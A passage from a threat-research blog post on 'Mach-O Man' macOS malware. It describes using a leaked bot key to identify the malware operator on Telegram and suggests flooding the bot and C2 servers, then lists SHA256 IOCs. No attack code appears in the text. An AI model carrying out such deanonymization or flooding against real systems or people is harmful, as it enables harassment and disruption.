notifications from his faulty sidekick.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hauR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hauR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png 424w, https://substackcdn.com/image/fetch/$s_!hauR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png 848w, https://substackcdn.com/image/fetch/$s_!hauR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png 1272w, https://substackcdn.com/image/fetch/$s_!hauR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hauR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png" width="1326" height="574" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7cf511cd-a8fa-4aac-85a7-019c3b4d53fd_1326x574.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:574,&quot;width&quot;:1326,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:157420,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8715739-0dc9-470c-afcf-bb6c72ea60bb_1326x574.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hauR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png 424w, https://substackcdn.com/image/fetch/$s_!hauR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png 848w, https://substackcdn.com/image/fetch/$s_!hauR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png 1272w, https://substackcdn.com/image/fetch/$s_!hauR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db4fcb0-bab9-464f-bc85-85334b4df5df_1326x574.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Kicking the bot out of a group chat may not be the permanent solution you&#8217;re looking for, pony-head.</figcaption></figure></div><p>But there&#8217;s more! This key <strong>allows anyone to identify the bot owner</strong> or creator with a simple command like the following:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ICcx!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ICcx!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png 424w, https://substackcdn.com/image/fetch/$s_!ICcx!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png 848w, https://substackcdn.com/image/fetch/$s_!ICcx!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png 1272w, https://substackcdn.com/image/fetch/$s_!ICcx!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ICcx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png" width="2638" height="740" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b38d28e8-bcd4-440b-8e7e-77361e28c533_2638x740.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:740,&quot;width&quot;:2638,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:659065,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb38d28e8-bcd4-440b-8e7e-77361e28c533_2638x740.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ICcx!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png 424w, https://substackcdn.com/image/fetch/$s_!ICcx!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png 848w, https://substackcdn.com/image/fetch/$s_!ICcx!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png 1272w, https://substackcdn.com/image/fetch/$s_!ICcx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1695ca4c-34d5-4e7d-b823-cf38e4b1edc6_2638x740.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">You&#8217;re in for a wild ride</figcaption></figure></div><p>And with that information, it is possible <strong>to find him on Telegram</strong>. </p><p>Meet &amp; Greet with the Leader, here we come!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!M0SN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!M0SN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png 424w, https://substackcdn.com/image/fetch/$s_!M0SN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png 848w, https://substackcdn.com/image/fetch/$s_!M0SN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png 1272w, https://substackcdn.com/image/fetch/$s_!M0SN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!M0SN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png" width="560" height="487.7024070021882" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/eb434453-4230-4928-8de1-250d786faf24_914x796.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f3677c0d-502b-4ab8-8c38-4253d7e81462_914x796.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:796,&quot;width&quot;:914,&quot;resizeWidth&quot;:560,&quot;bytes&quot;:199995,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2d328617-5d6a-4674-a11d-81903175a638_914x796.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!M0SN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png 424w, https://substackcdn.com/image/fetch/$s_!M0SN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png 848w, https://substackcdn.com/image/fetch/$s_!M0SN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png 1272w, https://substackcdn.com/image/fetch/$s_!M0SN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb434453-4230-4928-8de1-250d786faf24_914x796.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Let&#8217;s make fear change sides.</figcaption></figure></div><p>There are plenty of bad people out there who would&#8217;ve texted him and given him the scare of his life. </p><p>We don&#8217;t do that here&#8230; ; )</p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;c0bea15c-d140-4155-a58c-c70070e21255&quot;,&quot;duration&quot;:null}"></div><p>And so, by combining these two <strong>C2</strong> <strong>vulnerabilities</strong>, we could easily turn this into a <strong>mass spamming campaign</strong>, flooding <strong>both the bot and the C2</strong> infrastructure and effectively causing<strong> their worst weekend outage of the year</strong>. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fMb4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fMb4!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png 424w, https://substackcdn.com/image/fetch/$s_!fMb4!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png 848w, https://substackcdn.com/image/fetch/$s_!fMb4!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png 1272w, https://substackcdn.com/image/fetch/$s_!fMb4!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fMb4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png" width="368" height="389.7269372693727" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/55ccaa36-dac9-4811-a748-040eeac39959_542x574.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f4cd7c30-dc51-4b4b-8dc5-dd6af227a53f_542x574.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:574,&quot;width&quot;:542,&quot;resizeWidth&quot;:368,&quot;bytes&quot;:143372,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4cd7c30-dc51-4b4b-8dc5-dd6af227a53f_542x574.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fMb4!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png 424w, https://substackcdn.com/image/fetch/$s_!fMb4!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png 848w, https://substackcdn.com/image/fetch/$s_!fMb4!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png 1272w, https://substackcdn.com/image/fetch/$s_!fMb4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55ccaa36-dac9-4811-a748-040eeac39959_542x574.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The worst <em>so far</em>. </p><p>And April has <em>just</em> begun.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Hl0N!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Hl0N!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!Hl0N!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!Hl0N!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!Hl0N!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Hl0N!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png" width="380" height="380" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:380,&quot;bytes&quot;:1223077,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Hl0N!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!Hl0N!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!Hl0N!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!Hl0N!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb646b2aa-8490-4c1e-9cf8-98fc3a70c817_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Mach-O Man developer returning to the office on Monday, only to find his cloud bill now worth 73 BTC.</figcaption></figure></div><p>Jokes aside, while still <strong>recycling old tricks</strong> and shuffling them among <strong>new shiny tools</strong>, they <strong>still remain a danger</strong> at large and it takes just one of your environment to be compromised for it to get out of control <strong>really fast</strong>.</p><p>I will release a <strong>full dissassemble</strong> of this malware <strong>in a technical article </strong>soon, which will include a deeper analysis, more interesting details and other IOCs.</p><p>As usual, <strong>thanks for reading</strong>,</p><p>don&#8217;t accept random meetings,</p><p>don&#8217;t believe <strong>random sites</strong> telling you <strong>to update your tools</strong>,</p><p>update your apps only <strong>from trusted and official sources</strong>,</p><p>and please,</p><p><strong>don&#8217;t get </strong><em><strong>rekdt</strong></em>.</p><div><hr></div><h2>IOCs</h2><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;ab13b608-e459-44be-a968-9f250b198ba9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">SHA256 (com.onedrive.launcher.plist) = eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5
SHA256 (com.onedrive.launcher.tmp) = eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5
SHA256 (D1yCPUyk.bin) = 0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90
SHA256 (D1YrHRTg.bin) = 0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90
SHA256 (localencode) = a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614
